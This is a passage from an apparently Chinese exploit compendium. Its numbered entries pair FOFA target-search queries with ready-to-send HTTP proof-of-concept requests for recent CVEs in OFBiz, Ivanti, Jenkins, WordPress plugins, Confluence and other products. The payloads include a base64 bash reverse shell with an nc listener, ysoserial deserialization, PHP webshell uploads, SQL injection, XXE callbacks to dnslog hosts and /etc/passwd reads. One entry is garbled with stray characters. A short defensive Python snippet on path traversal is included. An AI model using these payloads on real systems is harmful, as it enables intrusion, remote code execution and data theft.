User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
 <params>
  <param>
   <value>
    <struct>
     <member>
      <name>test</name>
      <value>
       <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
      </value>
     </member>
    </struct>
   </value>
  </param>
 </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the payload in the POC above with the generated one:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of an XML document; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php
7 F) N2 o9 O6 V" j; |4 N122. 北京百绰智能s200管理平台/importexport.php sql注入
* h* K- B) U- yCVE-2024-27718FOFA:title="Smart管理平台"" x3 F B9 _6 c' P( I/ Q3 {- d- |
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()# Q- q7 q! I9 u
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1' ^9 p: m. ^9 a1 Z
Host: x.x.x.x
5 t& I2 h4 |( }! qCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0; N3 u5 P. m' u2 n' O( Q. X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# V7 C* H; ?0 J) \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 w9 M& J5 q# i# JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 |7 `1 w2 V* @ Z2 P
Accept-Encoding: gzip, deflate, br
- M" {! J+ K$ m1 ^Upgrade-Insecure-Requests: 1
9 u, E- H! z4 C3 P( H$ i% aSec-Fetch-Dest: document
. A. {# I" Y9 C2 nSec-Fetch-Mode: navigate) f6 c; ]" b. P) Q8 M
Sec-Fetch-Site: none
5 C% e6 }8 I+ c8 R( z/ oSec-Fetch-User: ?1( M6 R8 e6 O. R0 }( e5 x
Te: trailers& r; w% ?$ M6 l ?! u( _" A7 s
Connection: close
* j$ L2 [' j. o! G% R6 Y: F$ t j. e; m) W& r/ U
/ ?+ h% G2 a& z. V2 `" e3 l
123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output comes back in the X-Cmd-Response response header.

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

File path: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the request line as-is (for example curl --path-as-is); most clients collapse the ../ segments before the request leaves, and the traversal never reaches the server.

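To see why the request above walks out of the static directory, and what the containment check that stops it looks like, here is an added example (not aiohttp's own code). It operates on the part of the path after the /static/ route prefix, already percent-decoded, and the static root /srv/app/static is a hypothetical value:

```python
import posixpath

STATIC_ROOT = "/srv/app/static"            # hypothetical static directory, not from the page
PAGE_TAIL = "../../../../../etc/passwd"    # the PoC path after the /static/ route prefix


def naive_static_path(root, tail):
    """Vulnerable pattern: join the request tail onto the root and trust the result.
    Each '..' walks one level up, so a tail with enough of them leaves root entirely."""
    return posixpath.normpath(posixpath.join(root, tail))


def safe_static_path(root, tail):
    """Hardened form: canonicalise first, then require the result to stay inside root.
    Returns the path to serve, or None when the request escapes the static directory.
    The tail is expected to be percent-decoded already; leading '/' is stripped so an
    absolute tail cannot replace the root inside posixpath.join."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, tail.lstrip("/")))
    # The trailing '/' matters: '/srv/app/static2' starts with '/srv/app/static' but is not inside it
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # On a real filesystem also resolve symlinks (os.path.realpath) before this comparison,
    # so that a link inside root cannot point outside it.
    return candidate


def classify(tail, root=STATIC_ROOT):
    """Return ('escape', naive_result) when the naive join leaves root, else ('ok', path)."""
    safe = safe_static_path(root, tail)
    if safe is None:
        return "escape", naive_static_path(root, tail)
    return "ok", safe


if __name__ == "__main__":
    for tail in (PAGE_TAIL, "css/app.css", "../static2/x.js", "a/../b.js"):
        print(repr(tail), "->", classify(tail))
```

The naive join resolves the PoC tail to /etc/passwd; the hardened check refuses it and still serves ordinary files under the root.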
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

Out-of-band confirmation: the external entity triggers a DNS lookup for the dnslog host.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
